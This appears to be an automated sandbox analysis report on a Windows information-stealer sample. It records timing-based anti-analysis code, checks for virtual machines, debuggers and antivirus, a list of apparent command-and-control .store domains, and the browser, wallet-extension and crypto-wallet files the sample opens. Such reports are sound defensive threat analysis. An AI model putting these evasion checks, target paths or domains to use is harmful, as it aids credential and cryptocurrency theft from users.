              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60016 second address: 4E60035 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E9842Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov si, bx 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 mov ch, BCh 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60035 second address: 4E60063 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 call 00007FC714E8FEF3h 0x0000000b push eax 0x0000000c pop edx 0x0000000d pop esi 0x0000000e popad 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC714E8FEEEh 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60063 second address: 4E600A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FC714E9842Fh 0x00000010 xchg eax, ecx 0x00000011 jmp 00007FC714E98436h 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FC714E9842Eh 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E600A5 second address: 4E600E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007FC714E8FEEDh 0x0000000b add esi, 13847A46h 0x00000011 jmp 00007FC714E8FEF1h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FC714E8FEEDh 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E600E3 second address: 4E600E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E600E9 second address: 4E600ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E600ED second address: 4E600F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E600F1 second address: 4E60114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [ebp-04h], 55534552h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC714E8FEF2h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60134 second address: 4E60157 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E98438h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60157 second address: 4E6015D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6015D second address: 4E60D46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC714E98432h 0x00000009 and si, A138h 0x0000000e jmp 00007FC714E9842Bh 0x00000013 popfd 0x00000014 jmp 00007FC714E98438h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c ret 0x0000001d nop 0x0000001e and bl, 00000001h 0x00000021 movzx eax, bl 0x00000024 lea esp, dword ptr [ebp-0Ch] 0x00000027 pop esi 0x00000028 pop edi 0x00000029 pop ebx 0x0000002a pop ebp 0x0000002b ret 0x0000002c add esp, 04h 0x0000002f jmp dword ptr [004DA41Ch+ebx*4] 0x00000036 push edi 0x00000037 call 00007FC714EBDE27h 0x0000003c push ebp 0x0000003d push ebx 0x0000003e push edi 0x0000003f push esi 0x00000040 sub esp, 000001D0h 0x00000046 mov dword ptr [esp+000001B4h], 004DCB10h 0x00000051 mov dword ptr [esp+000001B0h], 000000D0h 0x0000005c mov dword ptr [esp], 00000000h 0x00000063 mov eax, dword ptr [004D81DCh] 0x00000068 call eax 0x0000006a mov edi, edi 0x0000006c pushad 0x0000006d jmp 00007FC714E9842Eh 0x00000072 mov eax, 6DFCC1E1h 0x00000077 popad 0x00000078 xchg eax, ebp 0x00000079 jmp 00007FC714E9842Ch 0x0000007e push eax 0x0000007f push eax 0x00000080 push edx 0x00000081 push eax 0x00000082 push edx 0x00000083 pushad 0x00000084 popad 0x00000085 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60D46 second address: 4E60D4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60D4A second address: 4E60D50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4E60D50 second address: 4E60DE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC714E8FEF0h 0x00000009 and ah, FFFFFFD8h 0x0000000c jmp 00007FC714E8FEEBh 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 xchg eax, ebp 0x00000016 jmp 00007FC714E8FEF6h 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e jmp 00007FC714E8FEEEh 0x00000023 call 00007FC714E8FEF2h 0x00000028 mov ecx, 4D6925F1h 0x0000002d pop ecx 0x0000002e popad 0x0000002f cmp dword ptr [75AF459Ch], 05h 0x00000036 jmp 00007FC714E8FEEDh 0x0000003b je 00007FC785ABDB1Ah 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 push edx 0x00000045 pop eax 0x00000046 call 00007FC714E8FEEFh 0x0000004b pop eax 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4E60DE7 second address: 4E60DED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4E60E28 second address: 4E60EC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E8FEF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007FC714E8FEE9h 0x0000000e pushad 0x0000000f pushad 0x00000010 mov si, dx 0x00000013 popad 0x00000014 pushfd 0x00000015 jmp 00007FC714E8FEEFh 0x0000001a xor eax, 00698F2Eh 0x00000020 jmp 00007FC714E8FEF9h 0x00000025 popfd 0x00000026 popad 0x00000027 push eax 0x00000028 jmp 00007FC714E8FEF1h 0x0000002d mov eax, dword ptr [esp+04h] 0x00000031 jmp 00007FC714E8FEF1h 0x00000036 mov eax, dword ptr [eax] 0x00000038 jmp 00007FC714E8FEF1h 0x0000003d mov dword ptr [esp+04h], eax 0x00000041 pushad 0x00000042 mov si, dx 0x00000045 popad 0x00000046 pop eax 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4E60EC7 second address: 4E60EE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FC714E98437h 0x00000009 pop esi 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4E60EE4 second address: 4E60EEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4E60EEA second address: 4E60F35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007FC785ACD0A6h 0x0000000d push 75A92B70h 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov eax, dword ptr [esp+10h] 0x0000001d mov dword ptr [esp+10h], ebp 0x00000021 lea ebp, dword ptr [esp+10h] 0x00000025 sub esp, eax 0x00000027 push ebx 0x00000028 push esi 0x00000029 push edi 0x0000002a mov eax, dword ptr [75AF4538h] 0x0000002f xor dword ptr [ebp-04h], eax 0x00000032 xor eax, ebp 0x00000034 push eax 0x00000035 mov dword ptr [ebp-18h], esp 0x00000038 push dword ptr [ebp-08h] 0x0000003b mov eax, dword ptr [ebp-04h] 0x0000003e mov dword ptr [ebp-04h], FFFFFFFEh 0x00000045 mov dword ptr [ebp-08h], eax 0x00000048 lea eax, dword ptr [ebp-10h] 0x0000004b mov dword ptr fs:[00000000h], eax 0x00000051 ret 0x00000052 pushad 0x00000053 pushad 0x00000054 mov cx, 124Fh 0x00000058 jmp 00007FC714E98434h 0x0000005d popad 0x0000005e popad 0x0000005f mov esi, 00000000h 0x00000064 jmp 00007FC714E9842Ch 0x00000069 mov dword ptr [ebp-1Ch], esi 0x0000006c push eax 0x0000006d push edx 0x0000006e push eax 0x0000006f push edx 0x00000070 jmp 00007FC714E9842Ah 0x00000075 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4E60F35 second address: 4E60F44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E8FEEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4E60F80 second address: 4E60FD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC714E98431h 0x00000009 and ecx, 21A56106h 0x0000000f jmp 00007FC714E98431h 0x00000014 popfd 0x00000015 call 00007FC714E98430h 0x0000001a pop eax 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e cmp dword ptr [ebp+08h], 00002000h 0x00000025 pushad 0x00000026 mov di, 36F2h 0x0000002a push ebx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4E8085F second address: 4E808BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC714E8FEF6h 0x00000008 mov cx, E0B1h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], ebp 0x00000012 pushad 0x00000013 mov ecx, 1C7FF4E9h 0x00000018 call 00007FC714E8FEF6h 0x0000001d push eax 0x0000001e pop edi 0x0000001f pop esi 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FC714E8FEF8h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4E808BE second address: 4E8093F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E9842Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FC714E98434h 0x00000011 or si, F678h 0x00000016 jmp 00007FC714E9842Bh 0x0000001b popfd 0x0000001c movzx esi, dx 0x0000001f popad 0x00000020 push eax 0x00000021 pushad 0x00000022 mov eax, 35DE8FA7h 0x00000027 mov edx, eax 0x00000029 popad 0x0000002a xchg eax, esi 0x0000002b jmp 00007FC714E98436h 0x00000030 mov esi, dword ptr [ebp+0Ch] 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 pushfd 0x00000037 jmp 00007FC714E9842Ch 0x0000003c xor eax, 642ADB38h 0x00000042 jmp 00007FC714E9842Bh 0x00000047 popfd 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4E8093F second address: 4E80A3D instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FC714E8FEF8h 0x00000008 adc ch, FFFFFF98h 0x0000000b jmp 00007FC714E8FEEBh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 call 00007FC714E8FEF8h 0x00000018 jmp 00007FC714E8FEF2h 0x0000001d pop eax 0x0000001e popad 0x0000001f test esi, esi 0x00000021 jmp 00007FC714E8FEF1h 0x00000026 je 00007FC785A9D8F3h 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007FC714E8FEECh 0x00000033 adc ax, 0988h 0x00000038 jmp 00007FC714E8FEEBh 0x0000003d popfd 0x0000003e call 00007FC714E8FEF8h 0x00000043 pushfd 0x00000044 jmp 00007FC714E8FEF2h 0x00000049 xor ax, 1F18h 0x0000004e jmp 00007FC714E8FEEBh 0x00000053 popfd 0x00000054 pop esi 0x00000055 popad 0x00000056 cmp dword ptr [75AF459Ch], 05h 0x0000005d jmp 00007FC714E8FEEFh 0x00000062 je 00007FC785AB595Ah 0x00000068 push eax 0x00000069 push edx 0x0000006a pushad 0x0000006b jmp 00007FC714E8FEEBh 0x00000070 mov esi, 05BF68AFh 0x00000075 popad 0x00000076 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4E80A3D second address: 4E80A43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4E80A43 second address: 4E80A91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E8FEF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d pushad 0x0000000e mov edx, esi 0x00000010 call 00007FC714E8FEEEh 0x00000015 pop ecx 0x00000016 popad 0x00000017 mov edi, 5A3C7B76h 0x0000001c popad 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FC714E8FEF3h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4E80B59 second address: 4E80B5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4E80B5F second address: 4E80B63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 4EEF23 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 6A128F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 69FE4A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 4EC236 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 6CB73E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 72B48E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe TID: 3876 | Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 4512 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: file.exe, 00000000.00000002.2276496138.0000000000682000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696428655f
Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696428655
Source: file.exe, 00000000.00000003.2195045761.00000000057EA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696428655p
Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: file.exe, 00000000.00000002.2277734685.0000000001008000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2277498147.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269401849.0000000001007000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696428655s
Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696428655
Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696428655o
Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696428655j
Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2195045761.00000000057EA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: YNVMware
Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: file.exe, 00000000.00000002.2277498147.0000000000FF0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWL
Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: file.exe, 00000000.00000002.2276496138.0000000000682000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

              Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort

              HIPS / PFW / Operating System Protection Evasion

Source: file.exe, 00000000.00000002.2276292979.0000000000491000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: scriptyprefej.store
Source: file.exe, 00000000.00000002.2276292979.0000000000491000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: navygenerayk.store
Source: file.exe, 00000000.00000002.2276292979.0000000000491000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: founpiuer.store
Source: file.exe, 00000000.00000002.2276292979.0000000000491000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: necklacedmny.store
Source: file.exe, 00000000.00000002.2276292979.0000000000491000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: thumbystriw.store
Source: file.exe, 00000000.00000002.2276292979.0000000000491000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: fadehairucw.store
Source: file.exe, 00000000.00000002.2276292979.0000000000491000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: crisiwarny.store
Source: file.exe, 00000000.00000002.2276292979.0000000000491000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: presticitpo.store
Source: file.exe, 00000000.00000002.2276659661.00000000006C6000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: ?Program Manager
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: file.exe, 00000000.00000003.2241520955.000000000108B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269454821.00000000057A1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2241602076.00000000057A1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2280167860.00000000057A0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: file.exe PID: 5536, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: file.exe, 00000000.00000002.2277734685.0000000001008000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Electrum-LTC
Source: file.exe, 00000000.00000002.2277734685.0000000001008000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/ElectronCash
Source: file.exe | String found in binary or memory: Jaxx Liberty
Source: file.exe, 00000000.00000002.2277734685.0000000001008000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
Source: file.exe, 00000000.00000003.2226129618.000000000105A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: file.exe | String found in binary or memory: ExodusWeb3
Source: file.exe, 00000000.00000003.2225779181.0000000001068000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ets/Ethereum","d
Source: file.exe | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: file.exe | String found in binary or memory: keystore
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
